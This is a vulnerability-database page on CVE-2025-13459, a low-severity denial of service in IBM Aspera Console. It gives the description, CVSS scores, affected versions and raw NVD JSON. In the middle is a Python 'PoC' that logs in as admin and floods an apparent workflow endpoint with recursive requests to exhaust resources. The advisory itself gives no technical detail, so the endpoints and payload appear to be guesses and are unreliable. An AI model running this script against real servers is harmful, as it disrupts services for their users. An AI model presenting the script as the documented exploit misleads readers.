Security Vulnerability Report
中文
CVE-2025-13459 CVSS 2.7 LOW

CVE-2025-13459

Published: 2026-03-16 14:17:55
Last Modified: 2026-03-17 15:49:46
Source: [email protected]

Description

IBM Aspera Console 3.3.0 through 3.4.8 could allow a privileged user to cause a denial of service due to improper enforcement of behavioral workflow.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:ibm:aspera_console:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
IBM Aspera Console >= 3.3.0 且 < 3.4.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13459 PoC - IBM Aspera Console DoS via Behavioral Workflow # Requires high-privilege user credentials # Note: This PoC is for educational and authorized testing purposes only import requests import json import time from concurrent.futures import ThreadPoolExecutor TARGET_URL = "https://target-server:8443/aspera/console" USERNAME = "admin" PASSWORD = "password" def get_auth_token(): """Obtain authentication token with high-privilege account""" login_url = f"{TARGET_URL}/api/v1/auth/login" payload = { "username": USERNAME, "password": PASSWORD } try: response = requests.post(login_url, json=payload, verify=False, timeout=10) if response.status_code == 200: return response.json().get('token') except Exception as e: print(f"Authentication failed: {e}") return None def trigger_workflow_dos(token, iteration): """Send crafted request to trigger workflow processing flaw""" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Crafted workflow state transition request workflow_payload = { "workflow_id": "malicious_workflow", "action": "state_transition", "parameters": { "recursive": True, "delay": 0, "iteration_count": 999999 # Trigger resource exhaustion } } try: response = requests.post( f"{TARGET_URL}/api/v1/workflows/execute", json=workflow_payload, headers=headers, timeout=30 ) print(f"Request {iteration}: Status {response.status_code}") return response.status_code except requests.exceptions.Timeout: print(f"Request {iteration}: Timeout - service may be degraded") return 408 except Exception as e: print(f"Request {iteration}: Error - {e}") return 500 def main(): print("CVE-2025-13459 PoC - IBM Aspera Console DoS") print("=" * 50) token = get_auth_token() if not token: print("Failed to obtain authentication token") return print("Authentication successful, initiating DoS test...") # Send multiple concurrent requests to exhaust resources with ThreadPoolExecutor(max_workers=10) as executor: futures = [executor.submit(trigger_workflow_dos, token, i) for i in range(20)] results = [f.result() for f in futures] print(f"\nTest completed. Results: {results}") print("Check service availability after test.") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13459", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:54.710", "lastModified": "2026-03-17T15:49:45.937", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Aspera Console 3.3.0 through 3.4.8 could allow a privileged user to cause a denial of service due to improper enforcement of behavioral workflow."}, {"lang": "es", "value": "IBM Aspera Console 3.3.0 hasta 3.4.8 podría permitir a un usuario privilegiado causar una denegación de servicio debido a una aplicación indebida del flujo de trabajo de comportamiento."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-841"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:aspera_console:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3.0", "versionEndExcluding": "3.4.9", "matchCriteriaId": "51419171-DDAE-4AA6-9109-0582F2133296"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7263486", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.